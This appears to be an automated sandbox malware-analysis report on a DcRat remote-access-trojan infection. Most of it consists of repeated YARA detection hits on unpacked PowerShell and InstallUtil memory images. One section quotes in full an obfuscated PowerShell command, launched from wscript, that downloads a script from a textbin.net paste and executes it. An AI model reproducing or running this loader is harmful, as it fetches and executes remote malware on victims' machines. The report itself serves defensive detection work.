Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1	Jump to behavior

Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
